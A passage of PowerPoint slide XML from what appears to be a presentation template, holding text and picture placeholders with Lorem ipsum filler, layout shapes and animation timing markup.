              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vesti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> males </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="63" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9212440" y="1724596"/>
            <a:ext cx="2346677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Chort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591965" y="5563772"/>
            <a:ext cx="10973505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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72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569384" y="5109393"/>
            <a:ext cx="10996083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920" b="1" baseline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Put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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3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3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400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4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4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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="4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3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3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300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400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400" fill="hold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400" fill="hold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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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300" fill="hold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300" fill="hold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300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400"/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400" fill="hold"/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400" fill="hold"/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400"/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400" fill="hold"/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400" fill="hold"/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7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5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5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5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0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60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6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6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1" grpId="0" animBg="1"/>
      <p:bldP spid="62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6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6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6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3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3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6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65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6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6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6" grpId="0" animBg="1"/>
      <p:bldP spid="67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6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6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6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8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6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0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70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7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7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2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72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7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7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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rounded Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 36"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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40" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651303" y="1782081"/>
            <a:ext cx="1823989" cy="1641590"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd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384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sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549706" y="1675402"/>
            <a:ext cx="2063988" cy="1857589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69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569384" y="3717493"/>
            <a:ext cx="2099739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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70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569384" y="4159055"/>
            <a:ext cx="2099739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71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569385" y="4468789"/>
            <a:ext cx="2099739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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1338847" y="5269082"/>
            <a:ext cx="657777" cy="560681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>
                    <a:lumMod val="65000"/>
                  </a:schemeClr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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="85" name="Straight Connector 84"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3064933" y="1666242"/>
            <a:ext cx="0" cy="4147199"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash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8" name="Oval 107"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596691" y="1782081"/>
            <a:ext cx="1823989" cy="1641590"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd" cmpd="sng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384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9" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="55"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495094" y="1675402"/>
            <a:ext cx="2063988" cy="1857589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14" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="41" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3459339" y="3717493"/>
            <a:ext cx="2099739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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="42" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3459339" y="4159055"/>
            <a:ext cx="2099739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116" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3459340" y="4468789"/>
            <a:ext cx="2099739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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="44" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4228802" y="5269082"/>
            <a:ext cx="657777" cy="560681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>
                    <a:lumMod val="65000"/>
                  </a:schemeClr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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="126" name="Straight Connector 125"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011333" y="1666242"/>
            <a:ext cx="0" cy="4147199"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash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1" name="Oval 140"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6599531" y="1782081"/>
            <a:ext cx="1823989" cy="1641590"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd" cmpd="sng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384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2" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="56"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6497934" y="1675402"/>
            <a:ext cx="2063988" cy="1857589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45" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="46" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6462179" y="3717493"/>
            <a:ext cx="2099739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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="47" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
